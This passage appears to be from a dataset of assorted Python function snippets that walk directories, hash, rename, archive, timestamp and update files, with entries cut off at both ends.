1\n if status != 0:\n print('Trying again. 
Attempt {0} out of 30.'.format(tries))\n if tries == 30:\n break\n if status == 0:\n print('Succeeded.')\n else:\n print('Failed after 30 tries.')", "def _walk_dir(self, rootpath):\n assert os.path.isabs(rootpath)\n assert rootpath not in self._dirs\n relpath = self._get_rel_path(rootpath)\n self._dirs[relpath] = Directory(rootpath, relpath, None)\n for dirpath, dirnames, filenames in os.walk(rootpath):\n if 'refdata' in dirnames:\n dirnames.remove('refdata')\n currentdir = self._dirs[self._get_rel_path(dirpath)]\n # Loop through a copy so that we can modify dirnames.\n for dirname in list(dirnames):\n fullpath = os.path.join(dirpath, dirname)\n if fullpath == self._build_root:\n dirnames.remove(dirname)\n continue\n relpath = self._get_rel_path(fullpath)\n self._dirs[relpath] = Directory(fullpath, relpath, currentdir)\n extensions = ('.h', '.cuh', '.hpp', '.c', '.cc', '.cpp', '.cu', '.bm')\n for filename in filenames:\n basename, extension = os.path.splitext(filename)\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = File(fullpath, relpath, currentdir)\n elif extension == '.cmakein':\n extension = os.path.splitext(basename)[1]\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n sourcefile = GeneratorSourceFile(fullpath, relpath, currentdir)\n self._files[relpath] = sourcefile\n fullpath = os.path.join(dirpath, basename)\n relpath = self._get_rel_path(fullpath)\n fullpath = os.path.join(self._build_root, relpath)\n generatedfile = GeneratedFile(fullpath, relpath, currentdir)\n self._files[relpath] = generatedfile\n generatedfile.set_generator_source(sourcefile)\n elif extension in ('.l', '.y', '.pre'):\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = GeneratorSourceFile(fullpath, relpath, currentdir)", "def preprocess_dir(self, manifest_dir, content_property, kwargs=None):\n # Start the timer\n start = time.time()\n # Walk the directory and preprocess each file\n all_files = [\n os.path.join(r, file)\n for r, d, f in os.walk(manifest_dir)\n for file in f\n if file.endswith(\".json\") and not file.startswith(\"._\")\n ]\n for file in all_files:\n file = file.replace(\"\\\\\", \"/\") # Handle Windows paths\n tmp = file.split(\"/\")\n path = \"/\".join(tmp[:-1])\n filename = tmp[-1]\n self.preprocess(path, filename, content_property, kwargs=None)\n # Print time to completion\n end = time.time()\n t = end - start\n print(\"Processed all files in \" + str(t) + \" seconds.\")", "def readDirectory():\n tagdir = \"tagreplacements\"\n data = os.listdir(tagdir)\n for d in data:\n processFile(os.path.join(tagdir,d))\n \n #print(repd)", "def find_identical_files(directory):\n # go to the directory\n os.chdir(directory)\n \n # the problem wiht the md5 in our scan is that it causes the access time to be\n # updated. This renders future scans of the directory when looking for old files\n # to see them no older than the last scan. An approach to get around this would\n # be to retrieve the access times for all the files using the stat command\n # then use touch reset the access time to the original. This may change other\n # time stats too need to look in that. 
Here is a command set example for\n # changing the access times using touch:\n\n # addressing access times\n \n # 1 - fetch all the previous accesstimes\n try:\n find_stat = subprocess.Popen(\"find * -exec stat '{}' \\;\",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n # get the standard output\n out, err = find_stat.communicate() # get the standard output\n fstats = out.decode().split(\"\\n\") # split the text into a list\n fdates = {}\n for s in fstats:\n # parse stat output lines appear as follows:\n #16777220 1001760 -rw-r--r-- 1 todd staff 0 7 \"Jan 25 22:07:00 2015\" \"Jan 25 22:00:07 2015\" \"Jan 25 22:09:51 2015\" \"Jan 25 22:00:07 2015\" 4096 8 0 bar.txt\n if s == \"\":\n continue\n at = re.search(\"\\\"[^\\\"]+\\\"\",s).group(0)\n at = at.strip('\"')\n dspec = file_date_to_spec(at)\n #ss = s.split(\" \")\n ss = re.split(\"\\s+\",s)\n fn = \" \".join(ss[27:])\n fdates[fn] = dspec\n \n\n # get the md5 sums for each file...the side effect is the access time changes...but we repair these \n file_by_md5 = {}\n for fn in fdates.keys():\n \n # run md5 sum and get the value in a dict\n try:\n cmd_md5 = subprocess.Popen(\"md5 \"+fn,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n out, err = cmd_md5.communicate() # get the standard output\n md5 = out.decode() # split the text into a list\n md5 = md5.rstrip()\n if md5 == '':\n continue\n p = re.split(\"\\) = \",md5)\n if len(p) < 2:\n print(\"Failed to split \"+f)\n fnn = re.sub(\"MD5 \\(\",\"\",p[0])\n if fnn != fn:\n print(\"The file returned by md5 was not was not what was expected: \"+fnn)\n print(\"Expected: \"+fn)\n if file_by_md5.__contains__(p[1]):\n file_by_md5[p[1]] += [ fn ]\n else:\n file_by_md5[p[1]] = [ fn ]\n \n # repair access time using touch command e.g.:\n # /usr/bin/touch -a -t 201501252207.30 bar.txt\n tch = \"/usr/bin/touch -a -t \"+fdates[fn]+\" \"+fn\n return_signal = subprocess.call(tch.split())\n if return_signal != 0:\n print(\"Could not run command \"+tch)\n sys.exit()\n \n # create our dict of list of files keyed by md5 sums\n identical = {}\n for md5 in file_by_md5.keys():\n if len(file_by_md5[md5]) == 1:\n continue\n identical[md5] = file_by_md5[md5]\n \n # go back to our starting directory \n os.chdir(iwd)\n \n return(identical)", "def changeDate(names, date, ctlFunc = lambda s, d: True): \n\n # parse date\n try:\n day, month, year = re.fullmatch(\"(\\d\\d)(\\d\\d)(\\d\\d\\d\\d)\", date).groups()\n except AttributeError as e:\n raise\n \n # convert strings to ints\n day = int(day)\n month = int(month)\n year = int(year)\n \n for name in names:\n\n if ctlFunc(name, \"*DATE*\"):\n\n # get HH MM SS from file\n p_timestamp = os.path.getmtime(name)\n mdt = datetime.datetime.fromtimestamp(p_timestamp)\n \n # construct new datetime object with file time and provided date\n mdt = datetime.datetime(year, month, day, mdt.hour, mdt.minute, mdt.second)\n\n # change to new file timestamp by passing in datetime.timestamp() \n os.utime(name, (mdt.timestamp(), mdt.timestamp()))", "def count_files_md5hash_indir(self, dir_path):\n for file_name in os.listdir(dir_path):\n file_path = \"{}/{}\".format(dir_path, file_name)\n self.md5hash.add(count_md5hash_file(file_path))", "def updateBaseFiles(self):\n for filename, filetype in self._get_base_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename) \n elif filetype is 'Properties':\n 
lines, write_out = self._update_properties_file(lines,filename)\n else:\n raise TypeError, \"Unknown base file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update_ccd_dir(self, components: str):\n\n for f in os.listdir(components):\n c = ccd_reader.read_pdb_cif_file(os.path.join(components, f)).component\n self.process_template(c)", "def iterStamps(self):\n try:\n names = os.listdir(self.path)\n except OSError:\n return\n for name in names:\n if name and name[0] != '.':\n try:\n yield self.stampType(name)\n except:\n pass", "def process_directory(dir, exiftool_path):\n for path_object in pathlib.Path(dir).glob(\"**/*\"):\n if path_object.is_file():\n verbose(f\"Processing file {path_object}\")\n process_file(path_object, exiftool_path)\n elif path_object.is_dir():\n verbose(f\"Processing directory {path_object}\")\n process_directory(path_object, exiftool_path)", "def parse_directory(input_dir, start_date = datetime(1970,1,1), end_date = datetime(9999,12,31,23,59,59)):\n logging.debug(\"Beginning parse_directory {}\".format(input_dir))\n\n def parse_gzipped_directory(input_dir, start_date, end_date, infos, backup_stamps):\n \"\"\" Scans a gzipped directory. This one in different situation \"\"\"\n try:\n file_names = sorted(os.listdir(input_dir)) \n for file_name in file_names:\n if file_name.endswith(\".manifest.gz\") or file_name.endswith(\".manifest\"):\n tmp = parse_file(input_dir + \"/\" + file_name, start_date, end_date, backup_stamps)\n backup_stamps[tmp[\"backup_label\"]] = tmp[\"backup_timestamp_stop_ts\"]\n if tmp:\n infos.append(tmp)\n except OSError as e:\n logging.error(\"Failed to open directory\", exc_info=True)\n exit(1)\n except:\n raise\n \n if not path.isdir(input_dir):\n logging.error(\"The specified path is not a directory\")\n exit(1)\n\n infos = []\n backup_stamps = {}\n if path.exists(input_dir + \"/backup.info\"):\n\n dir_names = sorted(os.listdir(input_dir + \"/backup.history\"))\n for dir_name in dir_names:\n parse_gzipped_directory(input_dir + \"/backup.history/\" + dir_name, start_date, end_date, infos, backup_stamps)\n\n else:\n parse_gzipped_directory(input_dir, start_date, end_date, infos, backup_stamps)\n \n logging.debug(\"End parse_directory\")\n return infos", "def demo_walk():\n os.chdir('Lyrics')\n for directory_name, subdirectories, filenames in os.walk('.'):\n print(\"Directory:\", directory_name)\n print(\"\\tcontains subdirectories:\", subdirectories)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n\n # Loop through each file in the (current) directory\n for filename in filenames:\n new_name = get_fixed_filename(filename)\n source = os.path.join(directory_name, filename)\n destination = os.path.join(directory_name, new_name)\n print(\"Renaming {} to {}\".format(source, destination))\n os.rename(source, destination)", "def change_dir(filename):", "def index_all_files(self, root_dir):\n pass", "def refreshSizeCrcDate(apRoot,old_sizeCrcDate,progress=None,removeEmpties=False,fullRefresh=False):\n rootIsMods = (apRoot == dirs['mods']) #--Filtered scanning for mods directory.\n norm_ghost = (rootIsMods and Installer.getGhosted()) or {}\n ghost_norm = dict((y,x) for x,y in norm_ghost.iteritems())\n rootName = apRoot.stail\n progress = progress or bolt.Progress()\n new_sizeCrcDate = {}\n bethFiles = bush.bethDataFiles\n skipExts = Installer.skipExts\n asRoot = apRoot.s\n relPos = len(apRoot.s)+1\n pending = set()\n #--Scan for changed files\n progress(0,_(\"%s: 
Pre-Scanning...\") % rootName)\n progress.setFull(1)\n dirDirsFiles = []\n emptyDirs = set()\n for asDir,sDirs,sFiles in os.walk(asRoot):\n progress(0.05,_(\"%s: Pre-Scanning...\\n%s\") % (rootName,asDir[relPos:]))\n if rootIsMods and asDir == asRoot:\n sDirs[:] = [x for x in sDirs if x.lower() not in Installer.dataDirsMinus]\n dirDirsFiles.append((asDir,sDirs,sFiles))\n if not (sDirs or sFiles): emptyDirs.add(GPath(asDir))\n progress(0,_(\"%s: Scanning...\") % rootName)\n progress.setFull(1+len(dirDirsFiles))\n for index,(asDir,sDirs,sFiles) in enumerate(dirDirsFiles):\n progress(index)\n rsDir = asDir[relPos:]\n inModsRoot = rootIsMods and not rsDir\n apDir = GPath(asDir)\n rpDir = GPath(rsDir)\n for sFile in sFiles:\n #print '...',sFile\n ext = sFile[sFile.rfind('.'):].lower()\n rpFile = rpDir.join(sFile)\n if inModsRoot:\n if ext in skipExts: continue\n if not rsDir and sFile.lower() in bethFiles: continue\n rpFile = ghost_norm.get(rpFile,rpFile)\n isEspm = not rsDir and (ext == '.esp' or ext == '.esm')\n apFile = apDir.join(sFile)\n size = apFile.size\n date = apFile.mtime\n oSize,oCrc,oDate = old_sizeCrcDate.get(rpFile,(0,0,0))\n if size == oSize and (date == oDate or isEspm):\n new_sizeCrcDate[rpFile] = (oSize,oCrc,oDate)\n else:\n pending.add(rpFile)\n #--Remove empty dirs?\n if settings['bash.installers.removeEmptyDirs']:\n for dir in emptyDirs: \n try: dir.removedirs()\n except OSError: pass\n #--Force update?\n if fullRefresh: pending |= set(new_sizeCrcDate)\n changed = bool(pending) or (len(new_sizeCrcDate) != len(old_sizeCrcDate))\n #--Update crcs?\n if pending:\n progress(0,_(\"%s: Calculating CRCs...\\n\") % rootName)\n progress.setFull(1+len(pending))\n try:\n us = unicode(rpFile.s, sys.getfilesystemencoding())\n except TypeError:\n us = rpFile.s\n for index,rpFile in enumerate(sorted(pending)):\n string = (_(\"%s: Calculating CRCs...\\n%s\") % \n (rootName, us)\n )\n progress(index,string)\n apFile = apRoot.join(norm_ghost.get(rpFile,rpFile))\n crc = apFile.crc\n size = apFile.size\n date = apFile.mtime\n new_sizeCrcDate[rpFile] = (size,crc,date)\n old_sizeCrcDate.clear()\n old_sizeCrcDate.update(new_sizeCrcDate)\n #--Done\n return changed", "def parse_dir_replace(args, dirname, names):\n for name in names:\n path = os.path.join(dirname, name)\n\n if os.path.isfile(path):\n parse_file_replace(path, args)", "def deep_watch(self, d: Path) -> None:\n dir_links = [_ for _ in all_subdirs(d) if is_link_to_dir(_)]\n\n for watch_path in [d, *dir_links]:\n self.add_watch(\n str(watch_path),\n pyinotify.ALL_EVENTS,\n rec=True,\n )", "def find_old_files(directory):\n # go to the directory\n os.chdir(directory)\n \n # construct the find command to interogate the directory\n find_cmd = [\"find\"]\n find_cmd.append(\"*\")\n find_cmd.append(\"-atime\")\n find_cmd.append(\"+\"+str(DAYS_OLD))\n \n # run the find command\n try:\n find = subprocess.Popen(\" \".join(find_cmd),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n # get the standard output\n out, err = find.communicate() # get the standard output\n found = out.decode().split() # split the text into a list\n \n # go back to our starting directory \n os.chdir(iwd)\n \n return(found)", "def organizeDir(self):\n # Classify every file in dir\n for file in os.listdir(self.path):\n curPath = self.path + file\n self.moveFile(curPath)", "def fileManager():\n\n\t# First we change the working directory to the Downloads folder\n\tdownloadsPath = '/Users/harshithmohankumar/Downloads'\n\tos.chdir(downloadsPath)\n\t# 
Next we will get all of the files in the directory to organize\n\tfile = [f for f in os.scandir() if f.is_file()]\n\t# Now loop through all the files and organize them\n\tfor f in file:\n\t\tfileName = f.name\n\t\t# Obtain the extension of the file\n\t\ti = fileName.rfind('.')\n\t\text = fileName[i:].lower()\n\t\t# Match the extension to the according directory\n\t\ttoFile = get_key(ext)\n\t\t# Now move the file to that directory\n\t\tif Path(toFile).exists():\n\t\t\tfull_path = os.path.join(downloadsPath,fileName)\n\t\t\tfileName = renameFile(toFile,ext)\n\t\t\tos.chdir(downloadsPath)\n\t\t\tto_path = os.path.join(downloadsPath,toFile,fileName)\n\t\t\tos.rename(full_path,to_path)", "def pushDocsFromDir(docDir):\n\tfor i in os.listdir(docDir):\n\t\tif not(i.endswith(\".DS_Store\")):\n\t\t\tif not(docDir.endswith(\"/\")):\n\t\t\t\tfilename = (docDir+\"/\"+i)\n\t\t\telse:\n\t\t\t\tfilename = docDir + i\n\t\t\tpushDocumentToPhone(filename)\n\n\tprint \"Finished pushing files.\"", "def touch_files_dependent_on_changes(kymera_path, dirs, suffixes, changes):\n for dir in dirs:\n if dir[0] != '/':\n # This is a relative path to kymera root\n dir = kymera_path + dir\n if not os.path.exists(dir):\n print \"Directory %s included in ALL_SRCDIRS, ALL_INCDIRS or CFG_LIBS doesn't exist, continuing...\" % dir\n else:\n for file_name in os.listdir(dir):\n full_file_path= os.path.join(dir, file_name)\n # Filter a list of filenames down to those with one of the given suffixes\"\n if matching_file(suffixes, full_file_path):\n # Find all the files from a set with one of a list of suffices\n # containing one of the changed definitions\n if grep_words(changes, full_file_path):\n print \"Mark file for rebuild:\", full_file_path\n touch_file(full_file_path)", "def update(self):\n while True:\n result = win32event.WaitForSingleObject(self._overlapped.hEvent, 0)\n if result == win32con.WAIT_OBJECT_0:\n self._num_bytes_returned = win32file.GetOverlappedResult(\n self._directory,\n self._overlapped,\n True\n )\n timestamp = datetime.datetime.fromtimestamp(\n datetime.datetime.utcnow().timestamp()\n )\n self._event_properties['Path'] = self._get_path()\n self._event_properties['FileName'] = self._get_file_name()\n self._event_properties['Timestamp'] = timestamp\n self._event_properties['EventType'] = self._get_event_type()\n self._set_watcher()\n break\n if result == win32con.WAIT_FAILED:\n self.close()\n raise FileMonitorError()", "def filelist(basedir):\n day_files = []\n for root, dirs, files in os.walk(basedir):\n for file in files:\n if file.endswith(\".png\"):\n day_files.append(os.path.join(file))\n dates_files = []\n\n for i in day_files:\n year = i.split('_')[1]\n day = i.split('_')[2]\n mounth = i.split('_')[3]\n hour = i.split('_')[4]\n dates_files.append(UTCDateTime(year+'-'+mounth+'-'+day+'T'+hour)-3)\n return sorted(dates_files)", "def update_files(self):\n try:\n db_files = self.dbc.get_file_list(self.remote_directory)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) \\\n + \": Could not get remote file list.\"\n print e.reason\n return False\n new_files = set(db_files) - self.file_set\n old_files = self.file_set - set(db_files)\n if new_files != set() or old_files != set():\n self.file_set = set(db_files)\n for filename in new_files:\n try:\n self.dbc.get_file(filename)\n except rest.ErrorResponse as e:\n print str(datetime.datetime.now()) + e.reason\n for filename in old_files:\n try:\n os.remove(self.local_directory + \"/\" + filename)\n except OSError:\n pass\n print 
str(datetime.datetime.now()) + \": Fileset changed:\"\n print self.file_set\n email_changes(new_files, old_files)\n print str(datetime.datetime.now()) \\\n + \": Email sent from update_files().\"\n return True\n return False", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def updateDocFiles(self):\n for filename, filetype in self._get_doc_files():\n lines = open(filename).readlines()\n\n if self.Verbose:\n print 'Reading %s' % filename\n \n if filename.endswith('conf.py'):\n lines, write_out = self._update_doc_conf_file(lines, filename)\n else:\n raise TypeError, \"Unknown doc file type: %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def update_projects(self):\n self._read_directory()\n print(self._filenames)\n for filename in self._filenames:\n project = self._make_project(self._read_project(filename))\n self.projects.append(\n (int(project.get_id()), project)\n )\n self.projects = sorted(self.projects, reverse=True)", "def run(dirname: str) -> ():\n top, base = os.path.split(dirname)\n if base == '':\n base = top\n for root, _, files in os.walk(dirname):\n newdir = root.replace(base,f\"pub{base}\") # we might have nested folders\n os.makedirs(newdir)\n srcfiles = [f for f in files if f.endswith(\".rs\")]\n for src in srcfiles:\n if prep(os.path.join(root,src)) is not 0:\n pass # source is probably invalid. Just skip\n newfile = open(os.path.join(newdir,src),\"w\")\n oldfile = open(os.path.join(root,src),\"r\")\n try:\n scan(oldfile, newfile)\n except Exception as e:\n print(f\"failed to rewrite {src} with error:\\n{e}\")\n finally:\n newfile.close()\n oldfile.close()", "def _get_files_timestamps(self, working_dir: Union[str, os.PathLike]):\n return {f: os.path.getmtime(os.path.join(working_dir, f)) for f in os.listdir(working_dir)}", "def process_directory(self, directory):\n files = list(glob.iglob(os.path.join(directory, '*.md5')))\n logging.info('Processing %d datasets in directory %s.' % (len(files), directory))\n for f in files:\n f = os.path.basename(f)\n logging.info('Sending process request for dataset: %s' % f)\n self.job_submit_socket.send_string(f)\n logging.info('Finished processing %s.' 
% directory)", "def sync_dir(self):\n\n # mark the trajectories that we have seen\n trajectories = os.listdir(self.trajectory_dir)\n \n for trajectory_file in trajectories:\n\n if trajectory_file not in self.seen_trajectories:\n\n created = self.upload_trajectory(trajectory_file)\n self.seen_trajectories.add(trajectory_file)\n\n if created is True:\n print \"Total of %s solved trajectories\" % \\\n SolvedTrajectory.objects.count(), created", "def recurse(path):\n for dirpath, dirnames, filenames in os.walk(path):\n for filename in filenames:\n if filename.endswith('.robot'):\n filepath = os.path.join(dirpath, filename)\n reformat(filepath)", "def up_to_date(db, args, pattern):\n\n any_out_of_date = False\n num_found_files = 0\n for arg in args:\n find_data = None\n try:\n find_data = eugene_sys.FindFiles(pattern(arg))\n\n num_found_files = num_found_files+len(find_data)\n except ValueError:\n #print(f\"couldn't open directory {arg} or no suitable files found within...\")\n continue\n\n for file in find_data:\n key = file['cFileName']\n record = file['ftLastWriteTime']\n\n if db.compareWithRecord(key, record): continue # Up-to-date\n\n db_record = db.readRecord(key)\n db.writeRecord(key, record)\n\n old = eugene_sys.GetDateTimeFormat(db_record) if db_record > 0 else \"(null)\"\n new = eugene_sys.GetDateTimeFormat(record)\n\n msg = f\"`{key}' not up to date\"\n msg += _PAD[len(msg):]\n\n print(f\"{msg} ({old} -> {new})...\")\n any_out_of_date = True\n\n # For the query to return a 'True' result\n # - No database record can be out-of-date\n # - At LEAST one file in the directories\n # given in 'args' must've matched the\n # pattern\n result = (num_found_files > 0) and not any_out_of_date\n\n if result: print(\" ...up to date!\")\n return result", "def modtime_all(self):\n random.seed(4474)\n pathA = os.path.join(self.testpath,'A')\n pathB = os.path.join(self.testpath,'B')\n\n for dirpath, dirnames, filenames in os.walk(pathA):\n for f in filenames:\n change_time(os.path.join(dirpath,f),random.randint(-100*MAX_TIME_MOD,-(MAX_TIME_MOD+2)))\n try:\n os.makedirs(pathB)\n except:\n pass", "def refresh_all(self) -> None:\n self._update_thread.force_refresh_folder(self.feed_cache)", "def get_files_list(dirname, date_order, rdate_order):\n file_list = os.listdir(dirname)\n file_mtimes = dict.fromkeys(file_list)\n for f in file_list:\n if f[0] == '.':\n print \"Skipping file: \", f\n del file_mtimes[f]\n continue\n if date_order or rdate_order:\n file_mtimes[f] = os.stat(dirname + '/' + f).st_mtime\n if date_order or rdate_order:\n return sorted(file_mtimes.keys(), key=file_mtimes.get, reverse=rdate_order)\n else:\n return file_list", "def main():\n print(\"Current directory is\", os.getcwd())\n os.chdir('Lyrics/Lyrics')\n\n for dir_name, dir_list, file_list in os.walk(\".\"):\n for filename in file_list:\n file_path = dir_name + \"\\\\\" + filename\n new_name = get_fixed_filename(file_path)\n os.rename(file_path, new_name)", "def walk_dir(self, dir):\n if self.ppath_prefix_len:\n prefix = self.ppath_prefix[self.ppath_prefix_idx%self.ppath_prefix_len]\n self.ppath_prefix_idx += 1\n merged_path = os.path.join(prefix, dir)\n for root, dirs, files in self.fswalk_base(merged_path):\n yield merged_path, dirs, files\n else:\n yield self.fswalk_base(dir)", "def rebase_add_date():\n\tfilenames, clippings = load_clippings(inFolder)\n\tfor file, clip in zip(filenames, clippings):\n\t\tdate = \"-\".join(file.split(\"-\")[:3])\n\t\tdate = date.split(\"/\")[-1]\n\t\tclip[\"clipDate\"] = date\n\t\twith open(file, 
\"w\") as outfile:\n\t\t\tjson.dump(clip, outfile)", "def updateTestFiles(self):\n for filename, filetype in self._get_test_files():\n lines = open(filename).readlines()\n found_version_line = False\n\n if self.Verbose:\n print 'Reading %s' % filename\n\n if filetype is 'Python':\n lines, write_out = self._update_python_file(lines, filename)\n else:\n raise TypeError, \"Unknown test file type %s\" % filetype\n\n if write_out:\n self._file_writer(lines, filename)", "def _read_directory(self):\n self._filenames = glob.glob(self._directory + \"/*.project\")", "def directoryModifiedHandler(ob, event):\n query = dict(object_provides=IEntry.__identifier__)\n for l in ob.restrictedTraverse('@@folderListing')(**query):\n l.getObject().reindexObject(idxs=[\"pdir_keywords\"])", "def _archiveDataByDate(self, src, dest):\n root = os.getcwd()\n srcPath = join(root,src)\n destPath = join(root,dest)\n f = [] #Array with list of files in directory\n fDate = [] #Array with list of files with certain date;\n s = [] #Array with list of files successfully copied\n for (dirpath, dirnames, filenames) in walk(srcPath):\n f.extend(filenames)\n if len(f) > 0:\n for i in f:\n match = re.search(r'\\d{4}-\\d{2}-\\d{2}', i)\n if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:\n try:\n buffer_size = int(20000)\n fileSrcPath = join(dirpath, i)\n fileDestPath = join(destPath, i)\n with open(fileSrcPath, 'rb') as fsrc:\n with open(fileDestPath, 'wb') as fdest:\n copy = shutil.copyfileobj(fsrc,fdest,buffer_size)\n copy\n self._backupLog('Copy Operation File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) +'\\n') #+ '\\t'+ 'Path: '+ str(srcPath)\n s.append(i)\n except shutil.Error as e:\n self._backupLog('Error: %s' % e + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except IOError as e:\n self._backupLog('Error: %s' % e.strerror + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n if len(s) >0:\n for (dirpath,dirnames,filenames) in walk(srcPath):\n for cfile in f:\n for sfile in s:\n if cfile == sfile:\n try:\n filetoDelete = join(srcPath, cfile)\n os.remove(filetoDelete)\n self._backupLog('Delete Operation File: '+str(cfile)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except OSError, e:\n self._backupLog('Error deleting file: %s - %s.' 
% (e.filename, e.strerror) + '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')", "def parse_and_add_directory(self, list_of_root_tags, directory):\n\n # Check if directory exists and list_of_root_tags isn't empty\n\n if len(list_of_root_tags) == 0:\n raise Exception(\n \"{} : List of root tags empty in parse_and_add_directory!\".format(\n self.__schema_name\n )\n )\n\n if not os.path.isdir(directory):\n raise Exception(\n \"{} : Directory {} does not exist in parse_and_add_directory!\".format(\n self.__schema_name, directory\n )\n )\n\n for subdir, dirs, files in os.walk(directory):\n for file in files:\n if file.upper().endswith(\".XML\"):\n try:\n new_path = os.path.join(subdir, file)\n parsed = self.__get_parsed_relaxng(new_path)\n root_tag = parsed.getroot().tag\n if root_tag in list_of_root_tags:\n self.add_test(\n f\"Path Added: {file}\", new_path, None, parsed_xml=parsed\n )\n except:\n pass", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def loop_through_dates(in_dir,\n out_dir,\n start_date,\n end_date,\n extent,\n temporal_composite=\"monthly\",\n product=\"all_products\",\n area=\"global-extracted\",\n neodaas_name=False):\n\n start_date_obj = datetime.datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date_obj = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n\n current_date = start_date_obj\n\n while current_date < end_date_obj:\n\n if temporal_composite.lower() == \"monthly\":\n str_date = current_date.strftime(\"%Y%m\")\n else:\n str_date = current_date.strftime(\"%Y%m%d\")\n\n file_path = os.path.join(in_dir, temporal_composite, product,\n \"{:02}\".format(current_date.year),\n \"*{}*nc\".format(str_date))\n in_netcdfs = glob.glob(file_path)\n\n for in_netcdf in in_netcdfs:\n\n print(\"Extracting {}\".format(in_netcdf))\n out_netcdf_dir = os.path.join(out_dir,\n \"{:02}\".format(current_date.year))\n try:\n os.makedirs(out_netcdf_dir)\n except OSError:\n # If already exists continue\n pass\n\n if neodaas_name:\n output_name = \"OC-CCI_{product}_L4_{area}_{period}_{date}.nc\".format(\n product=product,\n area=area,\n period=TEMPORAL_COMPOSITE_NAMES[temporal_composite],\n date=str_date)\n else:\n output_name = os.path.basename(in_netcdf).replace(\".nc\",\n \"_{}.nc\".format(area))\n out_netcdf_file = os.path.join(out_netcdf_dir, output_name)\n\n if os.path.isfile(out_netcdf_file):\n continue\n\n libsubarea.nk_subarea(in_netcdf, out_netcdf_file,\n [\"lon\", \"lat\"], [extent[0], extent[3]],\n [extent[2], extent[1]])\n\n if temporal_composite.lower() == \"monthly\":\n current_date = current_date + relativedelta.relativedelta(months=1)\n # For the daily, 5day and 8day composite itterate a day at a time so get all composites\n # If not then when starting out of sequence keep missing data.\n else:\n current_date = current_date + relativedelta.relativedelta(days=1)", "def Main(root_directory):\n filepaths = GetAllFilepaths(root_directory)\n for filepath in filepaths:\n parser = fileparser.CreateParser(filepath)\n if not parser:\n ReportWarning('cannot find a parser for file %s, skipping...' 
%\n filepath)\n continue\n old_file_contents = ReadFileIntoString(filepath)\n comment_blocks = parser.FindAllCommentBlocks(old_file_contents)\n if not comment_blocks:\n ReportWarning('cannot find any comment blocks in file %s' %\n filepath)\n old_copyright_block = parser.FindCopyrightBlock(comment_blocks)\n if not old_copyright_block:\n ReportWarning('cannot find copyright block in file %s' % filepath)\n (year, holder) = parser.GetCopyrightBlockAttributes(old_copyright_block)\n if holder and not ConfirmAllowedCopyrightHolder(holder):\n ReportWarning(\n 'unrecognized copyright holder \"%s\" in file %s, skipping...' % (\n holder, filepath))\n continue\n new_copyright_block = parser.CreateCopyrightBlock(year, holder)\n if old_copyright_block:\n new_file_contents = old_file_contents.replace(\n old_copyright_block, new_copyright_block, 1)\n else:\n new_file_contents = new_copyright_block + old_file_contents\n WriteStringToFile(new_file_contents, filepath)", "def fileparse(self, dir, givendate, i, j):\t\t# i and j are counters that will be incremented by at most 1 (each) every time fileparse is called\n if self.findcreatedate() > givendate:\t# Test file's creation date against date passed into function\n if j != 0:\t\t\t\t# If this is the first time (locally) we've found a self.filename that needs to be copied, reset j\n print \"\\n\",\n j = 0\n dest = dir + self.filename\n copy(self.filename, dest)\n print \"\\r{} being copied\".format(self.filename),\n i += 1\t\t\t\t\t# increment our count of self.filenames that have been copied in a row\n else:\n j += 1\t\t\t\t\t# otherwise, increment our count of self.filenames skipped\n print \"\\r{} files parsed after last success\".format(j),\n countarf = [i, j]\t\t\t\t\t# put i an j into an array, then return it\n return countarf", "def traverse_posts(root):\n for (dirpath, dirnames, filenames) in os.walk(root):\n for filename in filenames:\n date, file = parse_filename(filename)\n if not date or not file:\n continue\n yield tuple([dirpath, filename, file, date])", "def upgrade_nrml(directory, dry_run, multipoint):\n for cwd, dirs, files in os.walk(directory):\n for f in files:\n path = os.path.join(cwd, f)\n if f.endswith('.xml'):\n ip = iterparse(path, events=('start',))\n next(ip) # read node zero\n try:\n fulltag = next(ip)[1].tag # tag of the first node\n xmlns, tag = fulltag.split('}')\n except: # not a NRML file\n xmlns, tag = '', ''\n if xmlns[1:] == NRML05: # already upgraded\n if 'sourceModel' in tag and multipoint:\n print('upgrading to multiPointSources', path)\n node0 = nrml.read(path)[0]\n sourceconverter.update_source_model(node0)\n with open(path, 'wb') as f:\n nrml.write([node0], f, gml=True)\n elif 'nrml/0.4' in xmlns and (\n 'vulnerability' in tag or 'fragility' in tag or\n 'sourceModel' in tag):\n if not dry_run:\n print('Upgrading', path)\n try:\n upgrade_file(path, multipoint)\n except Exception as exc:\n raise\n print(exc)\n else:\n print('Not upgrading', path)", "def get_update_file_list(directory):\n update_files_list = 